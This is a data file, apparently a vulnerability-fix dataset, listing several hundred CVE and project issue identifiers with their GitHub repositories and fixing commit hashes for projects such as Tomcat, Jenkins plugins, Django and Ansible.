+ZEPPELIN-2769;https://github.com/apache/zeppelin;None:None;False;709c5a70a8f37277c9eea0a1c0c9195b5eb21a74; +CVE-2017-1000354;https://github.com/jenkinsci/jenkins;None:None;False;02d24053bdfeb219d2387a19885a60bdab510479; +CVE-2011-2481;https://github.com/apache/tomcat;None:None;False;65cd282402881030b0c32a4b0cbfa1fbf4bbe721,a45c93e3c9139d70a207a7299f326b4831c2e544,3ab7d6be13fd59b872bb5c3745ca06035e15ba3f; +CVE-2019-10329;https://github.com/jenkinsci/influxdb-plugin;None:None;False;bfc2fcc0d8e6fb6f2dff5a45353abac5cefc0573; +CVE-2019-1003093;https://github.com/jenkinsci/nomad-plugin;None:None;False;3331d24896b815c375e528207c5572e18631c49d; +CVE-2016-6651;https://github.com/cloudfoundry/uaa;None:None;False;0ed081c9b515014a21954db0dc03a3ddbb30fac; +CVE-2016-0763;https://github.com/apache/tomcat;None:None;False;c08641da04d31f730b56b8675301e55db97dfe88,bc8717f41a379e812ffbbae2dd71ae6822fe680f,0531f7aeff1999d362e0a68512a3517f2cf1a6ae; +CVE-2019-10335;https://github.com/jenkinsci/electricflow-plugin;None:None;False;1a90ee7727f8c6925df3e410837ddf6be28cce53; +CVE-2020-2093;https://github.com/jenkinsci/cloudbees-jenkins-advisor-plugin;None:None;False;f53fe8a41a1566fdd7d2996779f6c5684ef3e2df; +CVE-2020-15275;https://github.com/moinwiki/moin-1.9;None:None;False;64e16037a60646a4d834f0203c75481b9c3fa74c; +CVE-2018-1000107;https://github.com/jenkinsci/ownership-plugin;None:None;False;42487df17cd272e504d3cd3e09abb4904f80dba2; +CVE-2017-1000242;https://github.com/jenkinsci/git-client-plugin;None:None;False;75ea3fe05650fc6ca09046a72493e2b3f066fb98; +CVE-2018-1000809;https://github.com/privacyidea/privacyidea;None:None;False;189312a99b499fe405fd3df5dd03a6b19ba66d46; +CVE-2018-1000425;https://github.com/jenkinsci/sonarqube-plugin;None:None;False;d1fe7cf3c46b2cf9f3629af87a7126a4007a52fd; +CVE-2019-10868;https://github.com/tryton/trytond;None:None;False;0ab5ef4631b1ed9a7cc1091bc0b841b3c014f668; +CVE-2020-26280;https://github.com/OpenSlides/OpenSlides;None:None;False;f3809fc8a97ee305d721662a75f788f9e9d21938; +CVE-2017-12634;https://github.com/apache/camel;None:None;False;2ae645e90edff3bcc1b958cb53ddc5e60a7f49f,adc06a78f04c8d798709a5818104abe5a8ae4b3; +CVE-2021-3281;https://github.com/django/django;None:None;False;02e6592835b4559909aa3aaaf67988fef435f62,21e7622dec1f8612c85c2fc37fe8efbfd3311e3,52e409ed17287e9aabda847b6afe58be2fa9f86; +CVE-2020-26258;https://github.com/x-stream/xstream;None:None;False;6740c04b217aef02d44fba26402b35e0f6f493ce; +CVE-2020-8570;https://github.com/kubernetes-client/java;None:None;False;eb2cfe945c1492503b086606734530550630d31f; +DJANGO-REQUEST-LOGGING-95;https://github.com/Rhumbix/django-request-logging;None:None;False;4674923482908788de345389d213a8d188505839; +CVE-2019-10289;https://github.com/jenkinsci/netsparker-cloud-scan-plugin;None:None;False;cce62d7188f12ab9cf1d5272eb859beb710d521a; +CVE-2014-3529;https://github.com/apache/poi;None:None;False;5f7a447c7b33662a32bd1f24dfc90ce9e46627c7,55d026a89ec849f6fdd611f7baabcc9e22d146b7,526abfe065b91c8baa02fd92918604e024764b82,6d1b0291c52c70486c25a18db4de962472910d64,4c9a4c36169364d457d9a27947a71cc2d21c2119; +JINJA-001;https://github.com/pallets/jinja;None:None;False;74bd64e56387f5b2931040dc7235a3509cde1611,9b53045c34e61013dc8f09b7e52a555fa16bed16; +CVE-2020-25640;https://github.com/jms-ra/generic-jms-ra;None:None;False;e431eecc0b91731e5702a46aa889c2242c72b9a6; +CVE-2021-21613;https://github.com/jenkinsci/tics-plugin;None:None;False;a64493ccf81a241c5e51736721c4fe9a3e56622b; +CVE-2020-27589;https://github.com/blackducksoftware/hub-rest-api-python;None:None;False;273b27d0de1004389dd8cf43c40b1197c787e7cd; +CVE-2020-15147;https://github.com/Cog-Creators/Red-DiscordBot;None:None;False;bf581b9f9711f89aafe838815e719a54b6b45924; +CVE-2018-20245;https://github.com/apache/airflow;None:None;False;66d0d05ea0802aec407e0ef5435a962080db0926; +CVE-2016-2048;https://github.com/django/django;None:None;False;adbca5e4db42542575734b8e5d26961c8ada7265; +CVE-2015-9543;https://github.com/openstack/nova;None:None;False;26d4047e17eba9bc271f8868f1d0ffeec97b555e; +CVE-2020-10799;https://github.com/deeplook/svglib;None:None;False;d6d08c4323a3656ee5ebe9a072a6e6237efde800; +CVE-2019-10306;https://github.com/jenkinsci/ontrack-plugin;None:None;False;7f0f806c18fdd6043103d848ba4c813cb805dd85; +CVE-2021-20250;https://github.com/wildfly/jboss-ejb-client;None:None;False;54331f5828b698eae6bff8e1c27f169048c15f8d; +CVE-2018-16407;https://github.com/mayan-edms/mayan-edms;None:None;False;076468a9225e4630a463c0bbceb8e5b805fe380c; +CVE-2018-17228;https://github.com/narkisr/nmap4j;None:None;False;06b58aa3345d2f977553685a026b93e61f0c491e; +CVE-2017-16763;https://github.com/bbengfort/confire;None:None;False;8cc86a5ec2327e070f1d576d61bbaadf861597ea; +CVE-2019-7537;https://github.com/pytroll/donfig;None:None;False;1f9dbf83b17419a06d63c14ef3fbd29dbc1b8ce5; +CVE-2020-15250;https://github.com/junit-team/junit4;None:None;False;610155b8c22138329f0723eec22521627dbc52ae; +CVE-2018-11765;https://github.com/apache/hadoop;None:None;False;94b0df839d36cf5d5e927b3642566c67d0689474; +CVE-2014-2064;https://github.com/jenkinsci/jenkins.git;None:None;False;fbf96734470caba9364f04e0b77b0bae7293a1ec; +CVE-2016-6801;https://github.com/apache/jackrabbit;None:None;False;eae001a54aae9c243ac06b5c8f711b2cb2038700,7fb4ba4a385069378c916b4fac3f145db802acd8,1a419283c3e272bbff6aa731b6eeeefdcb303182,b045c2cb795cc5115456a81cccb164f2bfe043a9,e80b756356610cba4d9537ea08337a53a6db9fb1,3ef204b4db2d43b9322141c92ebd4780639ae49a,5ed6a736b5c75842c3430e7504e324bd775c6440,ea75d7c2aeaafecd9ab97736bf81c5616f703244,fb4fe3601717201934bcbf6eb604d2e1ef2cb7ad,991cc31a6cc3a5f87fa7951afb939ff7859db789,0c00609a172b3af3b86a01abbf5ed473214702ba,9e08618c73a852710cfd9904b8558ceb5c1b754c,16f2f02fcaef6202a2bf24c449d4fd10eb98f08d; +CVE-2013-0239;https://github.com/apache/cxf;None:None;False;295a4e2f9eb3e7e0513980202949ccc424dee2d4; +CVE-2017-7481;https://github.com/ansible/ansible;None:None;False;ed56f51f185a1ffd7ea57130d260098686fcc7c2; +CVE-2017-1000243;https://github.com/jenkinsci/favorite-plugin;None:None;False;b6359532fe085d9ea6b7894e997e797806480777; +CVE-2014-3678;https://github.com/jenkinsci/monitoring-plugin;None:None;False;f0f6aeef2032696c97d4b015dd51fa2b841b0473; +CVE-2010-1632;https://github.com/apache/axis-axis2-java-core;None:None;False;026d9037c3040580c2b04d8d8e4691c33a933418,dbb2a3d37baf651f34b3bb064badb0e2c377f46b; +CVE-2019-14864;https://github.com/ansible/ansible;None:None;False;c76e074e4c71c7621a1ca8159261c1959b5287af; +CVE-2018-1000412;https://github.com/jenkinsci/jira-plugin;None:None;False;612a6ef06dbd5a63bea0b128142c726e96195eda; +CVE-2015-1833;https://github.com/apache/jackrabbit;None:None;False;4fee7534a6c12d3d0bf79d6d991c019fba4dd017,85aa90d9259a3256bbbda10e1e474669e5ca2f41,2d98103d8f49fd4766624933ca02f4d54b79fada,bbd9a764e235c4b6cb4b1912fb688eaaf63df89e,cfc2df1f3ac6739e79a455c08cbfc926e6d55523,ff07ebc1230db0deea15b4a0508eb28e3c81f3ee,4c8211cad02fba2082579c58eb36582129166a9c; +CVE-2014-6633;https://github.com/tryton/trytond;None:None;False;13b9fce7296a6301343ab67fab2f1a1af61e4bb0,397765e3e2b2a3b6fbba886396bf9aa047e74a99; +CVE-2021-21240;https://github.com/httplib2/httplib2;None:None;False;bd9ee252c8f099608019709e22c0d705e98d26bc; +CVE-2019-9740;https://github.com/urllib3/urllib3;None:None;False;9b76785331243689a9d52cef3db05ef7462cb02d,efddd7e7bad26188c3b692d1090cba768afa9162; +CVE-2019-1003001;https://github.com/jenkinsci/jenkins;None:None;False;fa832c58b06556d9d3e0224be28f9c8673f3230b; +CVE-2017-1000355;https://github.com/jenkinsci/jenkins;None:None;False;701ea95a52afe53bee28f76a3f96eb0e578852e9; +CVE-2018-15531;https://github.com/javamelody/javamelody;None:None;False;ef111822562d0b9365bd3e671a75b65bd0613353; +CVE-2020-8929;https://github.com/google/tink;None:None;False;93d839a5865b9d950dffdc9d0bc99b71280a8899; +CVE-2014-3577;https://github.com/apache/httpcomponents-client;None:None;False;51cc67567765d67f878f0dcef61b5ded454d3122; +CVE-2008-5518;https://github.com/apache/geronimo;None:None;False;aa0c2c26dde8930cad924796af7c17a13d236b16,f8a612df7b06729bfd6c826e1a110d4bb40dc1f5,67dda0760bb0925ead201ddd5d809ff53686d63f; +CVE-2014-0034;https://github.com/apache/cxf;None:None;False;b4b9a010bb23059251400455afabddee15b46127; +CVE-2013-4444;https://github.com/apache/tomcat;None:None;False;482ab8200a0c8df905b7f40c15bc5649bd5350d9; +CVE-2014-0107;https://github.com/apache/xalan-j;None:None;False;cbfd906cc5a1f1566fa1a98400c82e56077fae0c; +ARMERIA-CPJ2;https://github.com/line/armeria;None:None;False;80310b36196b6fa6efd15af61635d2aa48c44418; +CVE-2018-1000167;https://github.com/OISF/suricata-update;None:None;False;76270e73128ca1299b4e33e7e2a74ac3d963a97a; +CVE-2019-20916;https://github.com/pypa/pip;None:None;False;5776ddd05896162e283737d7fcdf8f5a63a97bbc; +CVE-2021-25122;https://github.com/apache/tomcat;None:None;False;dd757c0a893e2e35f8bc1385d6967221ae8b9b9,bb0e7c1e0d737a0de7d794572517bce0e91d30f,d47c20a776e8919eaca8da9390a32bc8bf8210b; +CVE-2017-7674;https://github.com/apache/tomcat;None:None;False;b94478d45b7e1fc06134a785571f78772fa30fed,9044c1672bbe4b2cf4c55028cc8b977cc62650e7,f52c242d92d4563dd1226dcc993ec37370ba9ce3,52382ebfbce20a98b01cd9d37184a12703987a5a; +CVE-2019-11236;https://github.com/urllib3/urllib3;None:None;False;0aa3e24fcd75f1bb59ab159e9f8adb44055b2271; +CVE-2019-1003025;https://github.com/jenkinsci/cloudfoundry-plugin;None:None;False;61208697f60b91ad7f03a4dcec391b6d2115abca; +CVE-2020-26891;https://github.com/matrix-org/synapse;None:None;False;34ff8da83b54024289f515c6d73e6b486574d69; +CVE-2020-25592;https://github.com/saltstack/salt;None:None;False;daa39c58370641913aa8d5a7a0f44254973dd66b; +CVE-2019-18212;https://github.com/angelozerr/lsp4xml;None:None;False;c3af46f73eefdda66386cb61bf6b7125009d4ecc; +CVE-2021-24122;https://github.com/apache/tomcat;None:None;False;7f004ac4531c45f9a2a2d1470561fe135cf27bc,800b03140e640f8892f27021e681645e8e32017,920dddbdb981f92e8d5872a4bb126a10af5ca8a,935fc5582dc25ae10bab6f9d5629ff8d996cb53; +CVE-2018-1000864;https://github.com/jenkinsci/jenkins;None:None;False;73afa0ca786a87f05b5433e2e38f863826fcad17; +CVE-2013-4347;https://github.com/joestump/python-oauth2;None:None;False;82dd2cdd4954cd7b8983d5d64c0dfd9072bf4650; +CVE-2016-6817;https://github.com/apache/tomcat;None:None;False;079372fc7bac8e2e378942715c9ce26a4a72c07a,85c63227edabbfb4f2f500fc557480a190135d21; +CVE-2014-3498;https://github.com/ansible/ansible;None:None;False;8ed6350e65c82292a631f08845dfaacffe7f07f5; +CVE-2014-2067;https://github.com/jenkinsci/jenkins.git;None:None;False;5d57c855f3147bfc5e7fda9252317b428a700014; +CVE-2015-5346;https://github.com/apache/tomcat;None:None;False;f58aa9f5273e08c56389af344910302b7c078321,41fbee7ba15435a831f765597ff907c56ebf2169,6287be37d8d06c320215c45f7e2b8380411692e0,0dd9e7811a06e0e131da734eb706a1db4a77119c,c39b7ffc2145644f7f3cf9e3cd4aada5048e56a0; +CVE-2020-13926;https://github.com/apache/kylin;None:None;False;9fc77eb523aab5aa0299888280241a84b64c4457; +CVE-2013-1777;https://github.com/apache/geronimo;None:None;False;ee031c5e62b0d358250d06c2aa6722518579a6c5; +CVE-2014-0086;https://github.com/pslegr/core-1.git;None:None;False;8131f15003f5bec73d475d2b724472e4b87d0757; +CVE-2021-20328;https://github.com/mongodb/mongo-java-driver;None:None;False;dcd67f113549276b44795243d41a442e821d2f5,0b441990d8621979c68a45586187f8a12c003f6,2d95b7e8d3bf6175e3e7a22e48c88243e6aa45d,2e258a502b3242b0dd7d5a5952e5cd219fce4c4,60d87d5a76645a331a77ccc45ef7c67aac88b23,ae5b1c0644456f1cf195846a37eea82f6248f81; +CVE-2015-8213;https://github.com/django/django;None:None;False;9f83fc2f66f5a0bac7c291aec55df66050bb699; +CVE-2020-11001;https://github.com/wagtail/wagtail;None:None;False;61045ceefea114c40ac4b680af58990dbe732389; +CVE-2018-8016;https://github.com/beobal/cassandra;None:None;False;28ee665b3c0c9238b61a871064f024d54cddcc79; +CVE-2018-1999027;https://github.com/jenkinsci/saltstack-plugin;None:None;False;5306bcc438ff989e4b1999a0208fd6854979999b; +CVE-2017-7893;https://github.com/saltstack/salt;None:None;False;0a0f46fb1478be5eb2f90882a90390cb35ec43cb; +CVE-2020-28491;https://github.com/FasterXML/jackson-dataformats-binary;None:None;False;de072d314af8f5f269c8abec6930652af67bc8e6; +CVE-2014-1830;https://github.com/requests/requests;None:None;False;f1893c835570d72823c970fbd6e0e42c13b1f0f2,fe4c4f146124d7fba2e680581a5d6b9d98e3fdf8,7ba5a534ae9fc24e40b3ae6c480c9075d684727e,97cf16e958a948ecf30c3019ae94f2e7ec7dcb7f; +CVE-2020-26263;https://github.com/tlsfuzzer/tlslite-ng;None:None;False;c28d6d387bba59d8bd5cb3ba15edc42edf54b368; +APACHE-AXIS2-5846;https://github.com/apache/axis2-java;None:None;False;65aaacc779530682887bc6da4099b5ec4cfab406; +CVE-2017-12197;https://github.com/letonez/libpam4j;None:None;False;84f32f4001fc6bdcc125ccc959081de022d18b6d; +CVE-2019-10156;https://github.com/bcoca/ansible;None:None;False;b9b0b230150eceb442c34c917d9e852d5e8b7371; +HTTPCLIENT-1803;https://github.com/apache/httpcomponents-client;None:None;False;0554271750599756d4946c0d7ba43d04b1a7b22; +CVE-2020-27222;https://github.com/eclipse/californium;None:None;False;00ab1d9fe07a24229a88ac87786fe3a0752374ab; +CVE-2019-10357;https://github.com/jenkinsci/workflow-cps-global-lib-plugin;None:None;False;6fce1e241d82641e8648c546bc63c22a5e07e96b; +CVE-2018-1999046;https://github.com/jenkinsci/jenkins;None:None;False;6867e4469525d16319b1bae9c840b933fe4e23c4; +CVE-2019-10392;https://github.com/jenkinsci/git-client-plugin;None:None;False;899123fa2eb9dd2c37137aae630c47c6be6b4b02; +CVE-2014-1932;https://github.com/python-pillow/Pillow;None:None;False;4e9f367dfd3f04c8f5d23f7f759ec12782e10ee7; +CVE-2020-13925;https://github.com/apache/kylin;None:None;False;335d61b62517006d7e7b55638bb6fd305dffbea1; +CVE-2020-11078;https://github.com/httplib2/httplib2;None:None;False;a1457cc31f3206cf691d11d2bf34e98865873e9e; +CVE-2020-27619;https://github.com/python/cpython;None:None;False;2ef5caa58febc8968e670e39e3d37cf8eef3cab,43e523103886af66d6c27cd72431b5d9d14cd2a,6c6c256df3636ff6f6136820afaefa5a10a3ac3,b664a1df4ee71d3760ab937653b10997081b179,e912e945f2960029d039d3390ea08835ad39374; +CVE-2016-6186;https://github.com/django/django;None:None;False;d03bf6fe4e9bf5b07de62c1a271c4b41a7d3d15; +CVE-2019-10363;https://github.com/jenkinsci/configuration-as-code-plugin;None:None;False;7506d50b846460ec9f4506f0e228d2e44f0d5a3e; +CVE-2017-7233;https://github.com/django/django;None:None;False;5ea48a70afac5e5684b504f09286e7defdd1a81a; +CVE-2019-10429;https://github.com/jenkinsci/gitlab-logo-plugin;None:None;False;1a64595353df91b5fcf2d9336fa627e06ef1f8a9; +CVE-2012-0803;https://github.com/apache/cxf;None:None;False;40f98d3448abf19fbb59a1a154ce104db650346b; +CVE-2012-4534;https://github.com/apache/tomcat;None:None;False;2bfb3fbd7ea1c58646f84d72029088baf418e486; +CVE-2020-11981;https://github.com/astronomer/airflow;None:None;False;4aea266a653b5211180183e9d7be63f7a0d2c223; +CVE-2019-1003012;https://github.com/jenkinsci/blueocean-plugin;None:None;False;1a03020b5a50c1e3f47d4b0902ec7fc78d3c86ce; +CVE-2018-1000548;https://github.com/umlet/umlet;None:None;False;e1c4cc6ae692cc8d1c367460dbf79343e996f9bd; +CVE-2019-10340;https://github.com/jenkinsci/docker-plugin;None:None;False;6ad27199f6fad230be72fd45da78ddac85c075db; +HENOSIS-001;https://github.com/vc1492a/henosis;None:None;False;0802302430e6f6a17b22a55ce3d9360656f3c8ba; +CVE-2018-1320;https://github.com/apache/thrift;None:None;False;d973409661f820d80d72c0034d06a12348c8705e; +CVE-2021-21239;https://github.com/IdentityPython/pysaml2;None:None;False;46578df0695269a16f1c94171f1429873f90ed99; +CVE-2020-25074;https://github.com/moinwiki/moin-1.9;None:None;False;6b96a9060069302996b5af47fd4a388fc80172b7; +CVE-2017-0359;https://salsa.debian.org/reproducible-builds/diffoscope.git;None:None;False;632a40828a54b399787c25e7fa243f732aef7e05; +CVE-2016-3092;https://github.com/apache/tomcat;None:None;False;2c3553f3681baf775c50bb0b49ea61cb44ea914f,d752a415a875e888d8c8d0988dfbde95c2c6fb1d,8999f8243197a5f8297d0cb1a0d86ed175678a77; +CVE-2019-7617;https://github.com/elastic/apm-agent-python;None:None;False;47286d746e05897c6b3af8d465aa56ab1ed8d678; +ND4J-001;https://github.com/deeplearning4j/deeplearning4j;None:None;False;f51f4242d67eed9c97a46051cc0c6c72d0830a27; +CVE-2013-4435;https://github.com/saltstack/salt;None:None;False;07972eb0a6f985749a55d8d4a2e471596591c80d,6a9752cdb1e8df2c9505ea910434c79d132eb1e2,6d8ef68b605fd63c36bb8ed96122a75ad2e80269,8e5afe59cef6743fe5dbd510dcf463dbdfca1ced,aca78f314481082862e96d4f0c1b75fa382bb885,1e3f197726aa13ac5c3f2416000089f477f489b5,7f190ff890e47cdd591d9d7cefa5126574660824,b73677435ba54ecfc93c1c2d840a7f9ba6f53410,ebdef37b7e5d2b95a01d34b211c61c61da67e46a; +CVE-2019-1003048;https://github.com/jenkinsci/prqa-plugin;None:None;False;6df96d7bd96dd9ef69575f43dc0e06a168d59b37,f6d8492a8279fdfe9e3652bd01a6809fb5f296b6; +CVE-2017-5651;https://github.com/apache/tomcat;None:None;False;494429ca210641b6b7affe89a2b0a6c0ff70109b,9233d9d6a018be4415d4d7d6cb4fe01176adf1a8; +CVE-2020-13654;https://github.com/xwiki/xwiki-platform;None:None;False;82c31ea56be4ac756140f082d216268e1dca6ac8; +CVE-2020-17534;https://github.com/apache/netbeans-html4j;None:None;False;fa70e507e5555e1adb4f6518479fc408a7abd0e6; +CVE-2021-22114;https://github.com/spring-projects/spring-integration-extensions;None:None;False;ad398071e205b24c0fb58ae7401ac4a97a7cf759; +RESTVIEW-001;https://github.com/mgedmin/restview;None:None;False;ef8d9e155dc4f4ca934bd5aa26ab36fb94b6e89b; +CVE-2019-16785;https://github.com/Pylons/waitress;None:None;False;8eba394ad75deaf9e5cd15b78a3d16b12e6b0eba; +CVE-2018-17187;https://github.com/apache/qpid-proton-j;None:None;False;0cb8ca03cec42120dcfc434561592d89a89a805e; +CVE-2018-1999044;https://github.com/jenkinsci/jenkins;None:None;False;e5046911c57e60a1d6d8aca9b21bd9093b0f3763; +CVE-2015-1839;https://github.com/saltstack/salt;None:None;False;22d2f7a1ec93300c34e8c42d14ec39d51e610b5c,b49d0d4b5ca5c6f31f03e2caf97cef1088eeed81; +CVE-2019-10412;https://github.com/jenkinsci/inedo-proget-plugin;None:None;False;9634846c65f204c2b54237674b2cecf66d5d5fdb; +CVE-2020-11054;https://github.com/qutebrowser/qutebrowser;None:None;False;3a5439d4c49b748fd4f8eff423dcfc5fab89941,472a0eca380290696dd0e2619fdb512564adbbc,53e297ad81c75cb3668232396918eb07e2ce2d4,556fe81b3146e5cd2e77df9d8ce57aebbbd72ea,f5d801251aa5436aff44660c87d7013e29ac586,1b7ffca4ed971724c6ebd6ffe004729cc463eec,4020210b193f77cf1785b21717f6ef7c5de5f0f,6821c236f9ae23adf21d46ce0d56768ac8d0c46,a45ca9c788f648d10cccce2af41405bf25ee294,d28ed758d077a5bf19ddac4da468f7224114df2,021ab572a319ca3db5907a33a59774f502b3b97,19f01bb42d02da539446a52a25bb0c1232b8632,2281a205c3e70ec20f35ec8fafecee0d5c4f347,45a2be3f9f32f900c0b567998433d43055f722e,f109c922e8169211fafc5dfbb35be50e24486f9,454d4c881f7d2d195fdda65e10943d5ab45e113,9bd1cf585fccdfe8318fff7af793730e74a04db,a92f37b0d6673b12def3a3dfd9c6cf01e8c28b4; +CVE-2014-0111;https://github.com/apache/syncope;None:None;False;f34772c918a4dd4dac2b01d79b51b701184c6658,46864183920323eb5e64780919455dd880585d8d; +CVE-2018-16876;https://github.com/ansible/ansible;None:None;False;ba4c2ebeac9ee801bfedff05f504c71da0dd2bc; +CVE-2020-17510;https://github.com/apache/shiro;None:None;False;6acaaee9bb3a27927b599c37fabaeb7dd6109403; +GEODE-4270;https://github.com/apache/geode;None:None;False;80ad2d70435fb255a8a2d08c8866fbb30a7bedd3; +CVE-2019-16540;https://github.com/jenkinsci/support-core-plugin;None:None;False;6b177ea7cc7347e13fa87174472400bbbe78d422; +CVE-2017-17835;https://github.com/apache/airflow;None:None;False;6aca2c2d395952341ab1b201c59011920b5a5c77; +HADOOP-12751;https://github.com/apache/hadoop;None:None;False;092b1997418c8042224d24751a8fdde7d39a9ed; +KNOWLEDGE-REPO-001;https://github.com/airbnb/knowledge-repo;None:None;False;5d6668206f0b3fa90c091e682b93867460501f11; +ASPEN-001;https://github.com/jaraco/aspen;None:None;False;296b1903c9a64f34b04cf7ea61a0585a36c56d2b; +CVE-2012-3451;https://github.com/apache/cxf;None:None;False;9c70abe28fbf2b4c4df0b93ed12295ea5a012554; +CVE-2019-10369;https://github.com/jenkinsci/jclouds-plugin;None:None;False;dd975cc394467c1bbd4d91104094b62157bcfdfc; +CVE-2019-1003037;https://github.com/jenkinsci/azure-vm-agents-plugin;None:None;False;e36c8a9b0a436d3b79dc14b5cb4f7f6032fedd3f; +CVE-2020-5427;https://github.com/spring-cloud/spring-cloud-dataflow;None:None;False;92fb903812ec3dcd2e28f39199b38d9465c7671c; +CVE-2019-10327;https://github.com/jenkinsci/pipeline-maven-plugin;None:None;False;e7cb858852c05d2423e3fd9922a090982dcd6392; +CVE-2019-10348;https://github.com/jenkinsci/gogs-webhook-plugin;None:None;False;34de11fe0822864c4c340b395dadebca8cb11844,55e00bc409a43f30539b0df5a3f20476268ece27; +CVE-2021-21234;https://github.com/lukashinsch/spring-boot-actuator-logview;None:None;False;760acbb939a8d1f7d1a7dfcd51ca848eea04e772; +CVE-2015-6938;https://github.com/jupyter/notebook;None:None;False;35f32dd2da804d108a3a3585b69ec3295b2677e; +CVE-2017-1000390;https://github.com/jenkinsci/tikal-multijob-plugin;None:None;False;3e6ab85019334a5b2a438264afdebe439cfc82b4,2424cec7a099fe4392f052a754fadc28de9f8d86; +CVE-2020-25032;https://github.com/corydolphin/flask-cors;None:None;False;67c4b2cc98ae87cf1fa7df4f97fd81b40c79b895; +CVE-2019-12400;https://github.com/apache/santuario-java;None:None;False;1a0f8cbf449b73e1549149b8b173aa5c1c315eed,267b8528d20a0bc09ed56d7c8b03ac4126464621,52ae824cf5f5c873a0e37bb33fedcc3b387cdba6,c5210f77a77105fba81311d16c07ceacc21f39d5; +CVE-2018-1000814;https://github.com/aio-libs/aiohttp-session;None:None;False;1b356f01bbab57d041c9a75bacd72fbbf8524728; +CVE-2018-1000807;https://github.com/pyca/pyopenssl;None:None;False;e73818600065821d588af475b024f4eb518c3509; +CVE-2020-7695;https://github.com/encode/uvicorn;None:None;False;789e2f135f361d26adda67918fe3f7c4b6ec01b8; +CVE-2018-14574;https://github.com/django/django;None:None;False;a656a681272f8f3734b6eb38e9a88aa0d91806f1; +CVE-2016-1000031;https://github.com/apache/commons-fileupload;None:None;False;02f6b2c4ef9aebf9cf8e55de8b90e73430b69385; +CVE-2020-26215;https://github.com/jupyter/notebook;None:None;False;32bd47068bcd042e7a76f46f3be44d9a59143820; +CVE-2016-1181;https://github.com/kawasima/struts1-forever;None:None;False;eda3a79907ed8fcb0387a0496d0cb14332f250e8; +CVE-2019-16547;https://github.com/jenkinsci/google-compute-engine-plugin;None:None;False;1dfef77f37bf5c005ac02c1bd79e44289b4d7da9; +CVE-2019-10135;https://github.com/containerbuildsystem/osbs-client;None:None;False;dee8ff1ea3a17bc93ead059b9567ae0ff965592c; +CVE-2020-2094;https://github.com/jenkinsci/cloudbees-jenkins-advisor-plugin;None:None;False;f53fe8a41a1566fdd7d2996779f6c5684ef3e2df; +CVE-2017-5662;https://github.com/apache/batik;None:None;False;efb98a96b9b64a557a1caf030e2c16c3902b9712,660ef628d637af636ea113243fe73f170ac43958; +CVE-2015-5607;https://github.com/ipython/ipython;None:None;False;1415a9710407e7c14900531813c15ba6165f0816; +CVE-2020-17516;https://github.com/apache/cassandra;None:None;False;c2f24d2c45aae6030310d881dcd96ba60d04a2ad; +JENKINS-RABBITMQ-PUBLISHER-970;https://github.com/jenkinsci/rabbitmq-publisher-plugin;None:None;False;f0306f229a79541650f759797475ef2574b7c057; +CVE-2019-10427;https://github.com/jenkinsci/aqua-microscanner-plugin;None:None;False;bb44b8637223a7b4e81c04753124d51bb616767a; +CVE-2020-13596;https://github.com/django/django;None:None;False;1f2dd37f6fcefdd10ed44cb233b2e62b520afb3,6d61860b22875f358fac83d903dc62989793481; +CVE-2018-1000112;https://github.com/jenkinsci/mercurial-plugin;None:None;False;54b4f82e80c89d51b12bc64258f6b59e98b0c16a; +CVE-2019-10344;https://github.com/jenkinsci/configuration-as-code-plugin;None:None;False;1c531c1a46fc1da6a82cd728bf66428083d30fef; +CVE-2019-10300;https://github.com/jenkinsci/gitlab-plugin;None:None;False;f028c65539a8892f2d1f738cacc1ea5830adf5d3; +CVE-2016-10320;https://github.com/deanmalmgren/textract;None:None;False;3aff9318001ca2689f58511facf332b12ec5bd72; +CVE-2020-15278;https://github.com/Cog-Creators/Red-DiscordBot;None:None;False;726bfd38adfdfaef760412a68e01447b470f438b; +CVE-2018-16837;https://github.com/ansible/ansible;None:None;False;b618339c321c387230d3ea523e80ad47af3de5c; +CVE-2011-3376;https://github.com/apache/tomcat;None:None;False;d5bd2e6000689c56f0832bf1ff40d9d9d74e4d63; +CVE-2019-1020003;https://github.com/inveniosoftware/invenio-records;None:None;False;361def20617cde5a1897c2e81b70bfadaabae60,4b3f74ead8db36cec6a6b97a77ddd56e0ff30e2,fbebbd9eda8facea81e8e6af45aa7f9932a7ab2; +CERULEAN-001;https://github.com/MD-Studio/cerulean;None:None;False;388b171477f909972d5dc9043ed5fcae4369e3b7; +CVE-2019-3895;https://github.com/openstack/octavia;None:None;False;d7d062a47ab54a540d81f13a0e5f3085ebfaa0d2; +CVE-2020-5236;https://github.com/Pylons/waitress;None:None;False;6e46f9e3f014d64dd7d1e258eaf626e39870ee1f; +WERKZEUG-753;https://github.com/pallets/werkzeug;None:None;False;4baf7f2580aef7040ab4b420690d16084901fd41; +CVE-2012-2138;https://github.com/apache/sling-old-svn-mirror;None:None;False;96e84960ac90e966f0f6cb6d4dfa8046eeeea8a0; +CVE-2019-10305;https://github.com/jenkinsci/xldeploy-plugin;None:None;False;764d328974bb9f6e9619c2315304ec907a6bc5ac; +DJANGO-CA-002;https://github.com/mathiasertl/django-ca;None:None;False;188ec93057b1eebf0bc02056006eabd052f3aad5; +CVE-2018-1199;https://github.com/spring-projects/spring-security;None:None;False;0eef5b4b425ab42b9fa0fde1a3f36a37b92558f; +CVE-2016-1494;https://github.com/sybrenstuvel/python-rsa;None:None;False;ab5d21c3b554f926d51ff3ad9c794bcf32e95b3c; +CVE-2018-20852;https://github.com/python/cpython;None:None;False;4749f1b69000259e23b4cc6f63c542a9bdc62f1; +CVE-2015-5262;https://github.com/apache/httpcomponents-client;None:None;False;6705924879810f617a7a21d34f16b6c0d61e8d34,09027e7286974bf6b61f4106395da2623121db8d,d954cd287dfcdad8f153e61181e20d253175ca8c; +APACHE-AXIS2-5683;https://github.com/apache/axis2-java;None:None;False;1b560264151217dae8b34b6aa4dfff4f51377656; +CVE-2016-1182;https://github.com/kawasima/struts1-forever;None:None;False;eda3a79907ed8fcb0387a0496d0cb14332f250e8; +CVE-2019-3558;https://github.com/facebook/fbthrift;None:None;False;c5d6e07588cd03061bc54d451a7fa6e84883d62b; +CVE-2020-7938;https://github.com/plone/plone.restapi;None:None;False;6f7c08b722c39579d2b7103937f60a1bb450a030; +CVE-2019-1003038;https://github.com/jenkinsci/repository-connector-plugin;None:None;False;9288f0427ef25ec2c62d1c28f5a5c21a3cdd4a7a; +SCRAPY-3415;https://github.com/scrapy/scrapy;None:None;False;8a58d2305f42474e5b054f1b7f13043a7afd9ab6; +CVE-2014-3490;https://github.com/ronsigal/Resteasy.git;None:None;False;9b7d0f574cafdcf3bea5428f3145ab4908fc6d83; +CVE-2020-2091;https://github.com/jenkinsci/ec2-plugin;None:None;False;0cdbaf2d7da5c368209f427559c8608dec22a63b; 